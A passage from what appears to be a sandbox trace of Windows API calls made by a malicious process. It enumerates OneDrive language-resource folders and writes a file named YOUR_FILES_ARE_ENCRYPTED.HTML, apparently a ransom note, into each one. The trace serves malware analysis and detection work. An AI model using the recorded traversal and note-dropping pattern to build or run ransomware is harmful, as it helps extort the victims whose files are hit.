lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\*" [0112.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b820b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x18b820b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1989ef6a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.079] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b820b8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x18b820b8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1989ef6a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.079] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1989ef6a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1989ef6a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a464b30, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.079] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.079] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.079] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.079] lstrlenW (lpString=".mui") returned 4 [0112.079] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.079] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1989ef6a, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1989ef6a, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a464b30, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.079] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.079] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.079] GetProcessHeap () returned 0x600000 [0112.079] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.080] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.081] CloseHandle (hObject=0x330) returned 1 [0112.081] GetProcessHeap () returned 0x600000 [0112.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.082] GetProcessHeap () returned 0x600000 [0112.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.082] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a48ae1d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a48ae1d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a48ae1d, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ko", cAlternateFileName="")) returned 1 [0112.082] StrStrIW (lpFirst="ko", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.082] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko") returned 78 [0112.082] GetProcessHeap () returned 0x600000 [0112.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.082] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko" [0112.082] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\*" [0112.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a48ae1d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a48ae1d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a7abf56, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.082] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a48ae1d, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a48ae1d, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a7abf56, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.082] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7abf56, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a7abf56, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a94f788, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.082] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.082] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.082] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.082] lstrlenW (lpString=".mui") returned 4 [0112.082] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.082] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a7abf56, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a7abf56, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a94f788, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.082] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.082] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.082] GetProcessHeap () returned 0x600000 [0112.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.083] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.084] CloseHandle (hObject=0x330) returned 1 [0112.084] GetProcessHeap () returned 0x600000 [0112.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.084] GetProcessHeap () returned 0x600000 [0112.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.085] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a975942, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a975942, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1a975942, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 1 [0112.085] StrStrIW (lpFirst="kok", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.085] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok") returned 79 [0112.085] GetProcessHeap () returned 0x600000 [0112.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.085] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok" [0112.085] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\*" [0112.085] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a975942, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a975942, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ac24464, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0112.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a975942, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1a975942, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ac24464, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac24464, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1ac24464, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ad092fa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.085] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.085] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\FileSync.LocalizedResources.dll.mui") returned 115 [0112.085] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.085] lstrlenW (lpString=".mui") returned 4 [0112.085] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.085] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac24464, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1ac24464, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ad092fa, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.085] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0112.085] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0112.085] GetProcessHeap () returned 0x600000 [0112.086] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.086] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.087] CloseHandle (hObject=0x330) returned 1 [0112.087] GetProcessHeap () returned 0x600000 [0112.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.087] GetProcessHeap () returned 0x600000 [0112.087] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.088] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ae142b4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1ae142b4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1ae142b4, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0112.088] StrStrIW (lpFirst="ku-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.088] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab") returned 83 [0112.088] GetProcessHeap () returned 0x600000 [0112.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.089] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab" [0112.089] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\*" [0112.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ae142b4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1ae142b4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b1a7cae, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.090] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ae142b4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1ae142b4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b1a7cae, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="..", cAlternateFileName="")) returned 1 [0112.090] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1a7cae, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b1a7cae, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b2b2bd5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.090] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.090] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0112.090] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.090] lstrlenW (lpString=".mui") returned 4 [0112.090] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.090] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b1a7cae, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b1a7cae, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b2b2bd5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfe9426dd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.090] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.090] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0112.090] GetProcessHeap () returned 0x600000 [0112.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.091] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.092] CloseHandle (hObject=0x330) returned 1 [0112.092] GetProcessHeap () returned 0x600000 [0112.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.093] GetProcessHeap () returned 0x600000 [0112.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.094] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b37172b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b37172b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b37172b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ky", cAlternateFileName="")) returned 1 [0112.094] StrStrIW (lpFirst="ky", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.094] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky") returned 78 [0112.094] GetProcessHeap () returned 0x600000 [0112.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.098] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ky" [0112.098] lstrcatW (in: 